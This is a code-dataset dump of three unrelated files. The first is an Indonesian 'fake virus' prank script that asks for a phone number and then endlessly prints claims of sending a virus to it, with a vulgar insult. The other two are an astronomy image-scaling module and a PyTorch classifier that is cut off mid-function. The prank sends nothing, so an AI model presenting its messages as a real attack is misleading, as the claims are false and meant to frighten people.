Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2
|
2021-11-17T03:35:03.000Z
|
2021-12-08T06:00:31.000Z
|
Virus-Fake-main/Android.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | null | null | null |
Virus-Fake-main/Android.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2
|
2021-11-05T18:07:48.000Z
|
2022-02-24T21:25:07.000Z
|
import os,time,sys
from datetime import datetime
def ketik(teks):
for i in teks + "\n":
sys.stdout.write(i)
sys.stdout.flush()
time.sleep(0.01)
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
#kqng ricod
saat_ini = datetime.now()
tgl = saat_ini.strftime('%d')
bln = saat_ini.strftime('%m')
thn = saat_ini.strftime('%Y')
waktu_new = (tgl+"-"+bln+"-"+thn)
xnxx="\033[85m"
q="\033[00m"
h2="\033[40m"
b2="\033[44m"
c2="\033[46m"
i2="\033[42m"
u2="\033[45m"
m2="\033[41m"
p2="\033[47m"
k2="\033[43m"
b='\033[1;34m'
i='\033[1;32m'
c='\033[1;36m'
m='\033[1;31m'
u='\033[1;35m'
k='\033[1;33m'
p='\033[1;37m'
h='\033[1;90m'
k3="\033[43m\033[1;37m"
b3="\033[44m\033[1;37m"
m3="\033[41m\033[1;37m"
os.system("clear")
ketik(m +" .---. .----------- ")
ketik(m +" / \ __ / ------ "+ k +" ["+ m +" VIRUS ANDROID"+ k +" ]")
ketik(m +" / / \( )/ ----- ")
ketik(m +" ////// ' \/ ` --- "+ p +" ➣"+ k +" Creator"+ m +" :"+ h +" ALDI BACHTIAR RIFAI")
ketik(m +" //// / // : : --- "+ p +" ➣"+ k +" Youtube"+ m +" :"+ h +" MR.1557 / B0C4H")
ketik(p +" // / / /` '-- "+ p +" ➣"+ k +" Github"+ m +" :"+ h +" https://github.com/Aldi098")
ketik(p +" // //..\\ ")
ketik(p +" ====UU====UU==== "+ k +" ["+ m +" VERSI 0.2"+ k +" ]")
ketik(p +" '//||\\` ")
ketik(p +" ''`` ")
ketik("")
try:
isi = input(p +" ➣"+ k +" Masukan Nomer "+ m +": "+ i)
mulai = input(p +" ➣"+ k +" Lanjut?"+ i +" y"+ k +"/"+ m +"t "+ m +": "+ i)
print("")
print("")
except (KeyboardInterrupt,EOFError):
ketik (m +' !'+ p +' BAY KONTOL!!')
sys.exit()
if mulai == "y":
print(m +" !"+ k +" Virus"+ p +" Sedang Di Siapkan")
time.sleep(2)
print("")
ulang = 1000000000000000000000000000000000000000000000000
for i in range(ulang):
time.sleep(0.01)
print ("\033[1;32m ✓{} Berhasil Mengirim{} Virus{} Ke Nomor >{} {}".format(p, m, p, k, isi))
elif mulai == "t":
print (m +" !"+ p +" program berhenti")
else:
print (m +" !"+ p +" tidak tersedia")
| 2.936254
| 111
| 0.500203
| 1,993
| 17,227
| 4.323131
| 0.063221
| 0.891017
| 1.285515
| 1.779944
| 0.893106
| 0.891017
| 0.891017
| 0.891017
| 0.891017
| 0.891017
| 0
| 0.021359
| 0.415685
| 17,227
| 5,866
| 112
| 2.936754
| 0.833996
| 0.495153
| 0
| 0.076923
| 0
| 0
| 0.105813
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015385
| false
| 0
| 0.030769
| 0
| 0.046154
| 0.107692
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
869cfc51ce16c38bdf09886876680ec614676ded
| 6,567
|
py
|
Python
|
synthetic/img_scale.py
|
train-your-deblender/cutout-evaluation
|
79009552d1c9072696034fa31f71273975f35749
|
[
"BSD-3-Clause"
] | null | null | null |
synthetic/img_scale.py
|
train-your-deblender/cutout-evaluation
|
79009552d1c9072696034fa31f71273975f35749
|
[
"BSD-3-Clause"
] | null | null | null |
synthetic/img_scale.py
|
train-your-deblender/cutout-evaluation
|
79009552d1c9072696034fa31f71273975f35749
|
[
"BSD-3-Clause"
] | null | null | null |
#
# Written by Min-Su Shin
# Department of Astrophysical Sciences, Princeton University
#
# You can freely use the code.
#
import numpy
import math
def sky_median_sig_clip(input_arr, sig_fract, percent_fract, max_iter=100):
"""Estimating sky value for a given number of iterations
@type input_arr: numpy array
@param input_arr: image data array
@type sig_fract: float
@param sig_fract: fraction of sigma clipping
@type percent_fract: float
@param percent_fract: convergence fraction
@type max_iter: max. of iterations
@rtype: tuple
@return: (sky value, number of iteration)
"""
work_arr = numpy.ravel(input_arr)
old_sky = numpy.median(work_arr)
sig = work_arr.std()
upper_limit = old_sky + sig_fract * sig
lower_limit = old_sky - sig_fract * sig
indices = numpy.where((work_arr < upper_limit) & (work_arr > lower_limit))
work_arr = work_arr[indices]
new_sky = numpy.median(work_arr)
iteration = 0
while ((math.fabs(old_sky - new_sky)/new_sky) > percent_fract) and (iteration < max_iter) :
iteration += 1
old_sky = new_sky
sig = work_arr.std()
upper_limit = old_sky + sig_fract * sig
lower_limit = old_sky - sig_fract * sig
indices = numpy.where((work_arr < upper_limit) & (work_arr > lower_limit))
work_arr = work_arr[indices]
new_sky = numpy.median(work_arr)
return (new_sky, iteration)
def sky_mean_sig_clip(input_arr, sig_fract, percent_fract, max_iter=100):
"""Estimating sky value for a given number of iterations
@type input_arr: numpy array
@param input_arr: image data array
@type sig_fract: float
@param sig_fract: fraction of sigma clipping
@type percent_fract: float
@param percent_fract: convergence fraction
@type max_iter: max. of iterations
@rtype: tuple
@return: (sky value, number of iteration)
"""
work_arr = numpy.ravel(input_arr)
old_sky = numpy.mean(work_arr)
sig = work_arr.std()
upper_limit = old_sky + sig_fract * sig
lower_limit = old_sky - sig_fract * sig
indices = numpy.where((work_arr < upper_limit) & (work_arr > lower_limit))
work_arr = work_arr[indices]
new_sky = numpy.mean(work_arr)
iteration = 0
while ((math.fabs(old_sky - new_sky)/new_sky) > percent_fract) and (iteration < max_iter) :
iteration += 1
old_sky = new_sky
sig = work_arr.std()
upper_limit = old_sky + sig_fract * sig
lower_limit = old_sky - sig_fract * sig
indices = numpy.where((work_arr < upper_limit) & (work_arr > lower_limit))
work_arr = work_arr[indices]
new_sky = numpy.mean(work_arr)
return (new_sky, iteration)
def linear(inputArray, scale_min=None, scale_max=None):
"""Performs linear scaling of the input numpy array.
@type inputArray: numpy array
@param inputArray: image data array
@type scale_min: float
@param scale_min: minimum data value
@type scale_max: float
@param scale_max: maximum data value
@rtype: numpy array
@return: image data array
"""
# print "img_scale : linear"
imageData=numpy.array(inputArray, copy=True)
if scale_min == None:
scale_min = imageData.min()
if scale_max == None:
scale_max = imageData.max()
imageData = imageData.clip(min=scale_min, max=scale_max)
imageData = (imageData -scale_min) / (scale_max - scale_min)
indices = numpy.where(imageData < 0)
imageData[indices] = 0.0
indices = numpy.where(imageData > 1)
imageData[indices] = 1.0
return imageData
def sqrt(inputArray, scale_min=None, scale_max=None):
"""Performs sqrt scaling of the input numpy array.
@type inputArray: numpy array
@param inputArray: image data array
@type scale_min: float
@param scale_min: minimum data value
@type scale_max: float
@param scale_max: maximum data value
@rtype: numpy array
@return: image data array
"""
# print "img_scale : sqrt"
imageData=numpy.array(inputArray, copy=True)
if scale_min == None:
scale_min = imageData.min()
if scale_max == None:
scale_max = imageData.max()
imageData = imageData.clip(min=scale_min, max=scale_max)
imageData = imageData - scale_min
indices = numpy.where(imageData < 0)
imageData[indices] = 0.0
imageData = numpy.sqrt(imageData)
imageData = imageData / math.sqrt(scale_max - scale_min)
return imageData
def log(inputArray, scale_min=None, scale_max=None):
"""Performs log10 scaling of the input numpy array.
@type inputArray: numpy array
@param inputArray: image data array
@type scale_min: float
@param scale_min: minimum data value
@type scale_max: float
@param scale_max: maximum data value
@rtype: numpy array
@return: image data array
"""
# print "img_scale : log"
imageData=numpy.array(inputArray, copy=True)
if scale_min == None:
scale_min = imageData.min()
if scale_max == None:
scale_max = imageData.max()
factor = math.log10(scale_max - scale_min)
indices0 = numpy.where(imageData < scale_min)
indices1 = numpy.where((imageData >= scale_min) & (imageData <= scale_max))
indices2 = numpy.where(imageData > scale_max)
imageData[indices0] = 0.0
imageData[indices2] = 1.0
imageData[indices1] = numpy.log10(imageData[indices1])/factor
return imageData
def asinh(inputArray, scale_min=None, scale_max=None, non_linear=2.0):
"""Performs asinh scaling of the input numpy array.
@type inputArray: numpy array
@param inputArray: image data array
@type scale_min: float
@param scale_min: minimum data value
@type scale_max: float
@param scale_max: maximum data value
@type non_linear: float
@param non_linear: non-linearity factor
@rtype: numpy array
@return: image data array
"""
# print "img_scale : asinh"
imageData=numpy.array(inputArray, copy=True)
if scale_min == None:
scale_min = imageData.min()
if scale_max == None:
scale_max = imageData.max()
factor = numpy.arcsinh((scale_max - scale_min)/non_linear)
indices0 = numpy.where(imageData < scale_min)
indices1 = numpy.where((imageData >= scale_min) & (imageData <= scale_max))
indices2 = numpy.where(imageData > scale_max)
imageData[indices0] = 0.0
imageData[indices2] = 1.0
imageData[indices1] = numpy.arcsinh((imageData[indices1] - scale_min)/non_linear)/factor
return imageData
| 31.123223
| 95
| 0.678392
| 894
| 6,567
| 4.777405
| 0.106264
| 0.061812
| 0.032779
| 0.026223
| 0.86303
| 0.860688
| 0.860688
| 0.841489
| 0.811988
| 0.811988
| 0
| 0.009634
| 0.225522
| 6,567
| 210
| 96
| 31.271429
| 0.830122
| 0.319933
| 0
| 0.791667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0625
| false
| 0
| 0.020833
| 0
| 0.145833
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
86a9fbe39fe1458d24c82d7f01725e3ea5cfc307
| 73,566
|
py
|
Python
|
src/models/models.py
|
biswassanket/transformer_classification
|
054bf10cf28e87af286d57b01e8d20b01e07efeb
|
[
"MIT"
] | 3
|
2021-02-09T15:44:41.000Z
|
2021-11-02T15:34:11.000Z
|
src/models/models.py
|
biswassanket/transformer_classification
|
054bf10cf28e87af286d57b01e8d20b01e07efeb
|
[
"MIT"
] | null | null | null |
src/models/models.py
|
biswassanket/transformer_classification
|
054bf10cf28e87af286d57b01e8d20b01e07efeb
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import print_function, division
import sys
sys.path.insert(0,'.')
import torch
import torch.nn as nn
import torchvision.models as models
import numpy as np
import pdb
import torch
import torch.nn as nn
import torchvision.models as models
import torch.nn.functional as F
# Custom fusion modules
from .fusion import *
from .Rs_GCN import *
# import dgl.function as fn
# from dgl.nn.pytorch import edge_softmax, GATConv
"""
Visual Encoder model
"""
def load_model(args, classes_number, embedding_size):
if args.model == 'visualNet':
return Resnet_CNN(args=args, num_classes=classes_number, embedding_size=embedding_size)
elif args.model == 'lenet':
return Lenet_CNN(args = args, num_classes= classes_number, embedding_size=embedding_size)
elif args.model == 'baseNet':
return BaseNet(args = args, num_classes= classes_number, embedding_size=embedding_size)
elif args.model == 'fisherNet':
return FisherNet(args = args, num_classes= classes_number, max_textual = 1, embedding_size=embedding_size, reduced_size = 512)
elif args.model == 'orig_fisherNet':
return Orig_FisherNet(args = args, num_classes= classes_number, max_textual = 1, embedding_size=embedding_size, reduced_size = 512)
elif args.model == 'TextNet':
return TextNet(args = args, num_classes= classes_number, embedding_size=embedding_size, reduced_size = 512)
elif args.model == 'globalNet':
return globalNet(args=args, num_classes=classes_number, embedding_size=embedding_size)
elif args.model == 'baseGCN':
return baseGCN(args=args, num_classes=classes_number, embedding_size=embedding_size)
elif args.model == 'textGCN':
return textGCN(args=args, num_classes=classes_number, embedding_size=embedding_size)
elif args.model == 'fullGCN':
return fullGCN(args=args, num_classes=classes_number, embedding_size=embedding_size)
elif args.model == 'fullGCN_attn':
return fullGCN_attn(args=args, num_classes=classes_number, embedding_size=embedding_size)
elif args.model == 'dualGCN':
return dualGCN(args=args, num_classes=classes_number, embedding_size=embedding_size)
elif args.model == 'fullGCN_bboxes':
return fullGCN_bboxes(args=args, num_classes=classes_number, embedding_size=embedding_size)
elif args.model == 'GAT_bboxes':
return GAT_bboxes(args=args, num_classes=classes_number, embedding_size=embedding_size)
elif args.model == 'transformer_net':
return transformer_net(args=args, num_classes=classes_number, embedding_size=embedding_size)
else:
raise NameError(args.model + ' not implemented!')
class AttentionModel(nn.Module):
def __init__(self, hidden_layer=380):
super(AttentionModel, self).__init__()
self.attn_hidden_layer = hidden_layer
self.net = nn.Sequential(nn.Conv2d(2048, self.attn_hidden_layer, kernel_size=1),
nn.Conv2d(self.attn_hidden_layer, 1, kernel_size=1))
def forward(self, x):
attn_mask = self.net(x) # Shape BS 1x7x7
attn_mask = attn_mask.view(attn_mask.size(0), -1)
attn_mask = nn.Softmax(dim=1)(attn_mask)
attn_mask = attn_mask.view(attn_mask.size(0), 1, x.size(2), x.size(3))
x_attn = x * attn_mask
x = x + x_attn
return x, attn_mask
class Lenet_CNN(nn.Module):
def __init__(self, args, num_classes, embedding_size, pretrained=True):
super(Lenet_CNN, self).__init__()
self.args = args
self.embedding_size = embedding_size
self.num_classes = num_classes
self.pretrained = pretrained
lenet = models.googlenet(pretrained)
for name, child in lenet.named_children():
for param in child.parameters():
param.requires_grad = False
self.cnn_features = nn.Sequential(*list(lenet.children())[:-1])
# Initial Vf
self.bn_vf = nn.BatchNorm1d(1024)
self.fc_vf = nn.Linear(1024, 1024)
# Initial Tf
self.bn_tf = nn.BatchNorm1d(15)
self.fc_tf = nn.Linear(300, 300)
# Semantic Attention Weights
self.bn_w = nn.BatchNorm1d(1024)
self.fc_w = nn.Linear(1024, 300, bias=False)
# Reshape Visual Features Before Concat
self.bn1 = nn.BatchNorm1d(1024)
self.fc1 = nn.Linear(1024, 512)
# LAST LAYERS
self.bn_clf = nn.BatchNorm1d(512 + 300)
self.fc_clf = nn.Linear(512 + 300, num_classes)
def forward(self, im, textual_features, sample_size, local_features, text_bboxes, local_bboxes):
vf = self.cnn_features(im) # Size (BS x 2048 x 7 x 7)
vf = vf.view(sample_size, 1024)
vf = F.leaky_relu(self.fc_vf(self.bn_vf(vf)))
textual_features = F.leaky_relu(self.fc_tf(self.bn_tf(textual_features)))
wi = self.fc_w(self.bn_w(vf))
wi = torch.bmm(wi.view(sample_size, 1, 300), textual_features.permute(0, 2, 1))
wi = torch.tanh(wi)
wi = F.softmax(wi, dim=2)
# Attention over textual features
textual_features = torch.bmm(wi, textual_features)
# Reshape vf before concat
vf = self.bn1(vf)
vf = F.leaky_relu(self.fc1(vf))
x = torch.cat((textual_features[:, 0, :], vf), 1)
x = F.dropout(self.fc_clf(self.bn_clf(x)), p=0.3, training=self.training)
return x, 0, 0
class Resnet_CNN(nn.Module):
def __init__(self, args , num_classes, embedding_size, pretrained=True, attention=True):
super(Resnet_CNN, self).__init__()
self.args = args
self.embedding_size = embedding_size
self.num_classes = num_classes
self.pretrained = pretrained
resnet152 = models.resnet152(pretrained)
for name, child in resnet152.named_children():
if name not in ['layer4']:
# print(name + ' is frozen')
for param in child.parameters():
param.requires_grad = False
else:
# print(name + ' is not frozen')
for param in child.parameters():
param.requires_grad = True
self.cnn_features = nn.Sequential(*list(resnet152.children())[:-2])
#
#
# for param in self.cnn_features.parameters():
# param.requires_grad = False
# Attention model
self.attention = attention
self.attn = AttentionModel()
self.attn_bn = nn.BatchNorm2d(2048)
# OUTPUT OF CNN BS X 2048 X 7 X 7 = 100352
self.fc1_bn = nn.BatchNorm1d(2048*7*7)
self.fc1 = nn.Linear(2048*7*7, num_classes)
def forward(self, im, textual_features, sample_size, local_features):
x = self.cnn_features(im) # Size (BS x 2048 x 7 x 7)
if self.attention:
